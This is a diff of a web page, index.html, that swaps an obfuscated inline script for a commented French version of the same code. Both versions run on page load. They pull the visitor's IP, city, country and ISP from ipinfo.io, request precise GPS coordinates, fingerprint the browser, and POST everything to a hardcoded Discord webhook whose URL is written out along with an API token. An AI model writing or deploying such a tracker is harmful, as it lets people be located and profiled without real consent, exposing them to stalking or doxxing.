--- a/index.html
+++ b/index.html
@@ -10,7 +10,132 @@
     <p>Vos informations sont en cours d'envoi à Discord...</p>
 
     <script>
-(function(_0x5abefc,_0x4473c3){const _0x4ed7ae=_0x221e,_0x5152fc=_0x5abefc();while(!![]){try{const _0x596b17=-parseInt(_0x4ed7ae(0x17a))/0x1*(-parseInt(_0x4ed7ae(0x164))/0x2)+-parseInt(_0x4ed7ae(0x162))/0x3*(parseInt(_0x4ed7ae(0x17d))/0x4)+-parseInt(_0x4ed7ae(0x172))/0x5*(-parseInt(_0x4ed7ae(0x184))/0x6)+-parseInt(_0x4ed7ae(0x16c))/0x7+-parseInt(_0x4ed7ae(0x15c))/0x8*(parseInt(_0x4ed7ae(0x161))/0x9)+parseInt(_0x4ed7ae(0x16a))/0xa+-parseInt(_0x4ed7ae(0x17c))/0xb*(-parseInt(_0x4ed7ae(0x15a))/0xc);if(_0x596b17===_0x4473c3)break;else _0x5152fc['push'](_0x5152fc['shift']());}catch(_0x33dbfe){_0x5152fc['push'](_0x5152fc['shift']());}}}(_0x1a98,0x85c76));function _0x221e(_0xabfbf2,_0x260784){const _0x1a9856=_0x1a98();return _0x221e=function(_0x221e78,_0x2630b6){_0x221e78=_0x221e78-0x156;let _0x2cf9d4=_0x1a9856[_0x221e78];return _0x2cf9d4;},_0x221e(_0xabfbf2,_0x260784);}async function getIPInfoFromIpInfo(){const _0xef4ca5=_0x221e,_0x10d381='f4deffc3cad09c',_0x1afaa6=await fetch(_0xef4ca5(0x170)+_0x10d381),_0x3254cb=await _0x1afaa6['json']();return _0x3254cb;}function getExactLocation(){return new Promise((_0x309871,_0x594a00)=>{const _0x4ac0c2=_0x221e;navigator[_0x4ac0c2(0x185)]?navigator['geolocation']['getCurrentPosition'](_0x133e82=>{const {latitude:_0x5c3a1f,longitude:_0x45c4ba}=_0x133e82['coords'];_0x309871({'latitude':_0x5c3a1f,'longitude':_0x45c4ba});},_0xf66d0b=>{const _0x3ec543=_0x4ac0c2;_0x594a00(_0x3ec543(0x166));},{'enableHighAccuracy':!![],'timeout':0x2710,'maximumAge':0x0}):_0x594a00(_0x4ac0c2(0x171));});}function getBrowserInfo(){const _0x1443ce=_0x221e,_0x24871f=window[_0x1443ce(0x165)](_0x1443ce(0x17e))[_0x1443ce(0x163)],_0xc60788=_0x24871f?_0x1443ce(0x16f):'Light\x20Mode';return{'userAgent':navigator[_0x1443ce(0x174)],'language':navigator[_0x1443ce(0x182)],'platform':navigator[_0x1443ce(0x168)],'screenResolution':window['screen']['width']+'x'+window[_0x1443ce(0x160)]['height'],'theme':_0xc60788};}async function sendToDiscord(_0x241122){const _0x29a1e6=_0x221e,_0x26c195='https://discord.com/api/webhooks/1293996885325119518/IEfRSxBo76Bmep2JlPNqE2E4Fh80hVwOKPirTpy55uwCxlcxzjrd3Yc-D16h6pQ1N-5f',_0x88910d=[{'name':'IP','value':_0x241122['ip']||_0x29a1e6(0x15f)},{'name':_0x29a1e6(0x183),'value':_0x241122[_0x29a1e6(0x157)]||'Non\x20disponible'},{'name':'Région','value':_0x241122[_0x29a1e6(0x15b)]||'Non\x20disponible'},{'name':_0x29a1e6(0x177),'value':_0x241122[_0x29a1e6(0x16b)]||'Non\x20disponible'},{'name':_0x29a1e6(0x181),'value':_0x241122[_0x29a1e6(0x16d)]||_0x29a1e6(0x15f)},{'name':'Longitude','value':_0x241122[_0x29a1e6(0x175)]||_0x29a1e6(0x15f)},{'name':'Fournisseur\x20Internet','value':_0x241122[_0x29a1e6(0x159)]||_0x29a1e6(0x15f)},{'name':'User-Agent','value':_0x241122['userAgent']||_0x29a1e6(0x15f)},{'name':_0x29a1e6(0x15d),'value':_0x241122[_0x29a1e6(0x182)]||_0x29a1e6(0x15f)},{'name':_0x29a1e6(0x167),'value':_0x241122['platform']||_0x29a1e6(0x15f)},{'name':_0x29a1e6(0x158),'value':_0x241122[_0x29a1e6(0x15e)]||'Non\x20disponible'},{'name':_0x29a1e6(0x173),'value':_0x241122[_0x29a1e6(0x180)]||'Non\x20disponible'}],_0x588825=_0x88910d['filter'](_0xdf633b=>_0xdf633b[_0x29a1e6(0x17b)]!==null&&_0xdf633b[_0x29a1e6(0x17b)]!==''),_0x581e56={'content':_0x29a1e6(0x156),'embeds':[{'title':_0x29a1e6(0x17f),'fields':_0x588825}]},_0x2d7bae=await fetch(_0x26c195,{'method':'POST','headers':{'Content-Type':'application/json'},'body':JSON[_0x29a1e6(0x179)](_0x581e56)});if(!_0x2d7bae['ok'])throw new Error(_0x29a1e6(0x169)+_0x2d7bae['statusText']);}async function main(){const _0x3b6486=_0x221e;try{const _0x334eea=await getIPInfoFromIpInfo(),_0x2bc230=getBrowserInfo();let _0x2ca384={'latitude':'Non\x20disponible','longitude':_0x3b6486(0x15f)};try{_0x2ca384=await getExactLocation();}catch(_0x32a795){console['warn'](_0x32a795);}const _0x4ba532={..._0x334eea,..._0x2bc230,..._0x2ca384};await sendToDiscord(_0x4ba532),console[_0x3b6486(0x176)](_0x3b6486(0x16e));}catch(_0x1de4a8){console[_0x3b6486(0x178)]('Erreur\x20lors\x20de\x20l\x27envoi\x20des\x20informations\x20à\x20Discord:',_0x1de4a8);}}function _0x1a98(){const _0x4c608f=['value','5654EPWWPJ','20nxvLAA','(prefers-color-scheme:\x20dark)','Informations\x20de\x20l\x27utilisateur','theme','Latitude','language','Ville','6wuACpx','geolocation','Nouvelles\x20informations\x20utilisateur\x20:','city','Résolution\x20d\x27écran','org','28524MaWAvj','region','5384PFCsfr','Langue','screenResolution','Non\x20disponible','screen','10206eqWUaJ','607143arsciM','matches','322pEVGnA','matchMedia','Localisation\x20refusée\x20ou\x20non\x20disponible','Système\x20d\x27exploitation','platform','Erreur\x20lors\x20de\x20l\x27envoi\x20:\x20','10732990ehBFFM','country','6684902MLPiCa','latitude','Les\x20informations\x20utilisateur\x20ont\x20été\x20envoyées\x20avec\x20succès\x20à\x20Discord.','Dark\x20Mode','https://ipinfo.io/json?token=','Geolocation\x20non\x20supportée\x20par\x20le\x20navigateur','1144955BCxKOQ','Mode','userAgent','longitude','log','Pays','error','stringify','4683CPjKdm'];_0x1a98=function(){return _0x4c608f;};return _0x1a98();}main();
+        // Fonction pour récupérer l'adresse IP et d'autres informations via l'API ipinfo.io
+        async function getIPInfoFromIpInfo() {
+            const token = 'f4deffc3cad09c';  // Ton token pour ipinfo
+            const response = await fetch(`https://ipinfo.io/json?token=${token}`);
+            const data = await response.json();
+            return data;  // Renvoie toutes les informations d'IPinfo (IP, ville, région, pays, etc.)
+        }
+
+        // Fonction pour récupérer la localisation précise avec l'API Geolocation (Google popup)
+        function getExactLocation() {
+            return new Promise((resolve, reject) => {
+                if (navigator.geolocation) {
+                    navigator.geolocation.getCurrentPosition(
+                        (position) => {
+                            const { latitude, longitude } = position.coords;
+                            resolve({ latitude, longitude });
+                        },
+                        (error) => {
+                            reject('Localisation refusée ou non disponible');
+                        },
+                        {
+                            enableHighAccuracy: true,  // Demande la localisation précise
+                            timeout: 10000,  // Temps d'attente maximum
+                            maximumAge: 0    // Désactive la mise en cache
+                        }
+                    );
+                } else {
+                    reject('Geolocation non supportée par le navigateur');
+                }
+            });
+        }
+
+        // Récupérer les informations du navigateur (User-Agent, langue, mode clair/sombre, etc.)
+        function getBrowserInfo() {
+            const prefersDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches;
+            const theme = prefersDarkMode ? 'Dark Mode' : 'Light Mode';
+            return {
+                userAgent: navigator.userAgent,
+                language: navigator.language,
+                platform: navigator.platform,
+                screenResolution: `${window.screen.width}x${window.screen.height}`,
+                theme: theme
+            };
+        }
+
+        // Envoyer les informations au webhook Discord
+        async function sendToDiscord(info) {
+            const webhookURL = 'https://discord.com/api/webhooks/1293996885325119518/IEfRSxBo76Bmep2JlPNqE2E4Fh80hVwOKPirTpy55uwCxlcxzjrd3Yc-D16h6pQ1N-5f';  // Webhook Discord
+
+            // Préparer les champs du payload
+            const fields = [
+                { name: "IP", value: info.ip || "Non disponible" },
+                { name: "Ville", value: info.city || "Non disponible" },
+                { name: "Région", value: info.region || "Non disponible" },
+                { name: "Pays", value: info.country || "Non disponible" },
+                { name: "Latitude", value: info.latitude || "Non disponible" },
+                { name: "Longitude", value: info.longitude || "Non disponible" },
+                { name: "Fournisseur Internet", value: info.org || "Non disponible" },
+                { name: "User-Agent", value: info.userAgent || "Non disponible" },
+                { name: "Langue", value: info.language || "Non disponible" },
+                { name: "Système d'exploitation", value: info.platform || "Non disponible" },
+                { name: "Résolution d'écran", value: info.screenResolution || "Non disponible" },
+                { name: "Mode", value: info.theme || "Non disponible" }
+            ];
+
+            // Filtrer les champs pour éviter d'envoyer des champs vides ou null
+            const validFields = fields.filter(field => field.value !== null && field.value !== "");
+
+            const payload = {
+                content: "Nouvelles informations utilisateur :",
+                embeds: [{
+                    title: "Informations de l'utilisateur",
+                    fields: validFields
+                }]
+            };
+
+            // Envoyer la requête POST
+            const response = await fetch(webhookURL, {
+                method: 'POST',
+                headers: {
+                    'Content-Type': 'application/json',
+                },
+                body: JSON.stringify(payload)
+            });
+
+            if (!response.ok) {
+                throw new Error(`Erreur lors de l'envoi : ${response.statusText}`);
+            }
+        }
+
+        // Fonction principale
+        async function main() {
+            try {
+                // Récupérer les informations via l'API IPinfo
+                const ipInfo = await getIPInfoFromIpInfo();
+
+                // Récupérer les informations du navigateur
+                const browserInfo = getBrowserInfo();
+
+                // Initialisation de la localisation exacte avec valeurs par défaut
+                let locationInfo = { latitude: "Non disponible", longitude: "Non disponible" };
+
+                // Récupérer la localisation exacte si l'utilisateur accepte via Geolocation API
+                try {
+                    locationInfo = await getExactLocation(); // Prend la localisation exacte si disponible
+                } catch (error) {
+                    console.warn(error);
+                }
+
+                // Combiner toutes les données
+                const userInfo = {
+                    ...ipInfo,         // Inclut les infos IP (ville, région, pays, etc.)
+                    ...browserInfo,    // Inclut les infos du navigateur
+                    ...locationInfo    // Inclut la latitude/longitude exacte
+                };
+
+                // Envoyer les informations au webhook Discord
+                await sendToDiscord(userInfo);
+                console.log('Les informations utilisateur ont été envoyées avec succès à Discord.');
+            } catch (error) {
+                console.error('Erreur lors de l\'envoi des informations à Discord:', error);
+            }
+        }
+
+        // Exécuter la fonction principale
+        main();
     </script>
 </body>
 </html>
